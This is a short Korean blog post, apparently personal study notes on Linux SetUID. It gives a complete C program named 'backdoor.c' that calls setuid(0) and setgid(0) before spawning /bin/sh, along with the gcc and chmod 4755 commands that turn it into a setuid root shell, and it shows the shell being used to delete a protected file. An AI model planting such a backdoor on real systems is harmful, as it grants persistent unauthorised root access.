예전것/Linux Basic2009. 9. 7. 22:16

SetUID는 보안에 치명적일수 있다고 전에 배웠다.
참고 : http://cheesev.tistory.com/entry/aboutSetUID

위 그림처럼 원본의 bash쉘을 /tmp 에 복사하고 4755 권한을 주었다.


원래 SetUID개념이라면 root권한으로 실행이 되어서 rm -rf 명령으로 지워져야하지만 이에 대한 보안노력이 있어 잘 먹히지 않는다. 약간의 트릭으로 이를 피해보자

backdoor.c라는 소스를 코딩하여 컴파일
#include<stdio.h>
main(){
        setuid(0);
        setgid(0);
        system("/bin/sh");
}

#gcc -o backdoor backdoor.c
#chmod 4755 backdoor
을 수행한후

#./backdoor
를 쳐보면

쉘 권한이 바뀐것을 볼 수있다.

아까 지우지 못했던 파일하나를 지워보자. 지워진다.



'예전것 > Linux Basic' 카테고리의 다른 글

vmware tool 설치 팁.  (0) 2010.06.03
vi setting  (0) 2010.04.02
find 옵션에 +,- 붙은것들  (0) 2009.09.07
SETSUID에 대하여  (0) 2009.09.07
rlogin, rsh 설치  (0) 2009.08.07